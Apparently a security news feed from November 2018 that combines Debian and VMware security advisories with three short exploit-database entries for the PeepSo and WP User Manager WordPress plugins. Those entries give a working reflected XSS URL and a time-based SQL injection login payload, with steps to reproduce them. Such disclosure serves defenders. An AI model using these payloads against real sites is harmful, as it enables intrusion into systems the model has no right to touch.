[SECURITY] [DSA 4338-1] qemu security update
Debian Security Advisory DSA-4338-1
secur...@debian.org
https://www.debian.org/security/
Moritz Muehlenhoff
November 11, 2018
https://www.debian.org/security/faq

Package    : qemu
CVE ID     : CVE-2018-10839 CVE-2018-17962 CVE-2018-17963
Debian Bug : 908682 910431 911468 911469

Integer overflows in the processing of packets in network cards emulated by QEMU, a fast processor emulator, could result in denial of service.

In addition this update backports support to passthrough the new CPU features added in the intel-microcode update shipped in DSA 4273 to x86-based guests.

For the stable distribution (stretch), these problems have been fixed in version 1:2.8+dfsg-6+deb9u5.

We recommend that you upgrade your qemu packages.

For the detailed security status of qemu please refer to its security tracker page at: https://security-tracker.debian.org/tracker/qemu

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] [DSA 4337-1] thunderbird security update
Debian Security Advisory DSA-4337-1
secur...@debian.org
https://www.debian.org/security/
Moritz Muehlenhoff
November 10, 2018
https://www.debian.org/security/faq

Package : thunderbird
CVE ID  : CVE-2018-12389 CVE-2018-12390 CVE-2018-12392 CVE-2018-12393

Multiple security issues have been found in Thunderbird: Multiple memory safety errors may lead to the execution of arbitrary code or denial of service.

For the stable distribution (stretch), these problems have been fixed in version 1:60.3.0-1~deb9u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to its security tracker page at: https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
[SECURITY] [DSA 4336-1] ghostscript security update
Debian Security Advisory DSA-4336-1
secur...@debian.org
https://www.debian.org/security/
Salvatore Bonaccorso
November 10, 2018
https://www.debian.org/security/faq

Package    : ghostscript
CVE ID     : CVE-2018-11645 CVE-2018-17961 CVE-2018-18073 CVE-2018-18284
Debian Bug : 910678 910758 911175

Several vulnerabilities were discovered in Ghostscript, the GPL PostScript/PDF interpreter, which may result in denial of service, disclosure of existence and size of arbitrary files, or the execution of arbitrary code if a malformed Postscript file is processed (despite the dSAFER sandbox being enabled).

This update rebases ghostscript for stretch to the upstream version 9.25 which includes additional non-security related changes.

For the stable distribution (stretch), these problems have been fixed in version 9.25~dfsg-0+deb9u1.

We recommend that you upgrade your ghostscript packages.

For the detailed security status of ghostscript please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ghostscript

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
=== PeepSo v1.11.2 (WordPress Plugin) - Cross-Site Scripting Vulnerability in "Members" ===

# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - XSS Vulnerability in Members
# Date: [11-09-2018]
# Category: Webapps
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# File: Members
# Parameter: query
# Language: This application is available in English language.
# Plugin Description: PeepSo is a social network plugin for WordPress with different kinds of features, such as user profiles, user registration, and other features.

# Cross-Site Scripting Vulnerability:

http://www.website.com/wordpress/index.php/members/?blocked/=;>alert(23)
PeepSo v1.11.2 - Time-Based SQL Injection
PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection

# Exploit Title: PeepSo v1.11.2 (WordPress Plugin) - Time-Based SQL Injection
# Date: [11-09-2018]
# Category: Webapps
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
# Software Link: https://wordpress.org/plugins/peepso-core/
# Plugin: PeepSo
# Version: 1.11.2
# Language: This application is available in English language.
# Plugin Description: A social network plugin for WordPress with different kinds of features, such as user profiles, user login, user registration, and more features.

# Time-Based SQL Injection:

First, install WP User Manager v2.0.8.
Second, install PeepSo v1.11.2.
Third, go to the login panel of WP User Manager: http://www.website.com/wordpress/index.php/login
Fourth, type the SQL injection:

Username: iawcfqto'=sleep(10)='
Password: password

Finally, click on Login
NEW VMSA-2018-0027 VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage
VMware Security Advisory

Advisory ID: VMSA-2018-0027
Severity:    Critical
Synopsis:    VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage
Issue date:  2018-11-09
Updated on:  2018-11-09 (Initial Advisory)
CVE number:  CVE-2018-6981, CVE-2018-6982

1. Summary

VMware ESXi, Workstation, and Fusion updates address uninitialized stack memory usage.

2. Relevant Products

VMware vSphere ESXi (ESXi)
VMware Workstation Pro / Player (Workstation)
VMware Fusion Pro / Fusion (Fusion)

3. Problem Description

a. vmxnet3 uninitialized stack memory usage

VMware ESXi, Fusion and Workstation contain uninitialized stack memory usage in the vmxnet3 virtual network adapter. This issue may allow a guest to execute code on the host. The issue is present if vmxnet3 is enabled. Non vmxnet3 virtual adapters are not affected by this issue.

VMware would like to thank the organizers of GeekPwn2018 and security researcher Zhangyanyu of Chaitin Tech for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2018-6981 to this issue.

Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.

VMware       Product  Running            Replace with/         Mitigation/
Product      Version  on       Severity  Apply patch           Workaround
===========  =======  =======  ========  ====================  ===========
ESXi         6.7      ESXi     Critical  ESXi670-201811401-BG  None
ESXi         6.5      ESXi     Critical  ESXi650-201811301-BG  None
ESXi         6.0      ESXi     Critical  ESXi600-201811401-BG  None
Workstation  15.x     Any      Critical  15.0.1                None
Workstation  14.x     Any      Critical  14.1.4                None
Fusion       11.x     OS X     Critical  11.0.1                None
Fusion       10.x     OS X     Critical  10.1.4                None

b. vmxnet3 uninitialized stack memory usage

VMware ESXi, Fusion and Workstation contain uninitialized stack memory usage in the vmxnet3 virtual network adapter. This issue may lead to an information leak from host to guest. The issue is present if vmxnet3 is enabled. Non vmxnet3 virtual adapters are not affected by this issue.

VMware would like to thank the organizers of GeekPwn2018 and security researcher Zhangyanyu of Chaitin Tech for reporting this issue to us.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2018-6982 to this issue.

Column 5 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.

VMware       Product  Running             Replace with/         Mitigation/
Product      Version  on       Severity   Apply patch           Workaround
===========  =======  =======  =========  ====================  ===========
ESXi         6.7      ESXi     Important  ESXi670-201811401-BG  None
ESXi         6.5      ESXi     Important  ESXi650-201811301-BG  None
ESXi         6.0      ESXi     N/A        not affected          N/A
Workstation  Any      Any      N/A        not affected          N/A
Fusion       Any      OS X     N/A        not affected          N/A

4. Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

ESXi 6.7
Downloads: https://my.vmware.com/group/vmware/patch
Documentation: https://docs.vmware.com/en/VMware-vSphere/6.7/rn/esxi670-201811001.html

ESXi 6.5
Downloads: https://my.vmware.com/group/vmware/patch
Documentation: https://docs.vmware.com/en/VMware-vSphere/6.5/rn/esxi650-201811001.html

ESXi 6.0
Downloads: https://my.vmware.com/group/vmware/patch
Documentation: https://docs.vmware.com/en/VMware-vSphere/6.0/rn/esxi600-201811001.html

VMware Workstation Pro 14.1.4, 15.0.1
Downloads and Documentation:
https://www.vmware.com/go/downloadworkstation
https://docs.vmware.com/en/VMware-Workstation-Pro/index.html

VMware Workstation Player 14.1.4, 15.0.1
Downloads and Documentation:
https://www.vmware.com/go/downloadplayer
https://docs.vmware.com/en/VMware-Workstation-Player/index.html

VMware Fusion Pro / Fusion 10.1.4, 11.0.1
Downloads and Documentation:
https://www.vmware.com/go/downloadfusion
https://docs.vmware.com/en/VMware-Fusion/index.html

5. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6982

6.
WP User Manager v2.0.8 - Time-Based SQL Injection
WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection

# Exploit Title: WP User Manager v2.0.8 (WordPress Plugin) - Time-Based SQL Injection
# Date: [11-09-2018]
# Category: Webapps
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
# Software Link: https://wordpress.org/plugins/wp-user-manager
# Plugin: WP User Manager
# Version: v2.0.8 (last version)
# File: login
# Input: username
# Language: This application is available in English language.
# Plugin Description: A WordPress plugin to create user profiles with registration, login, password recovery, and other features.

# Time-Based SQL Injection:

http://www.website.com/wordpress/index.php/login

Username: iawcfqto'=sleep(10)='
Password: password

Click on Login
[SECURITY] [DSA 4335-1] nginx security update
Debian Security Advisory DSA-4335-1
secur...@debian.org
https://www.debian.org/security/
Moritz Muehlenhoff
November 08, 2018
https://www.debian.org/security/faq

Package : nginx
CVE ID  : CVE-2018-16843 CVE-2018-16844 CVE-2018-16845

Three vulnerabilities were discovered in Nginx, a high-performance web and reverse proxy server, which could result in denial of service in processing HTTP/2 (via excessive memory/CPU usage) or server memory disclosure in the ngx_http_mp4_module module (used for server-side MP4 streaming).

For the stable distribution (stretch), these problems have been fixed in version 1.10.3-1+deb9u2.

We recommend that you upgrade your nginx packages.

For the detailed security status of nginx please refer to its security tracker page at: https://security-tracker.debian.org/tracker/nginx

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org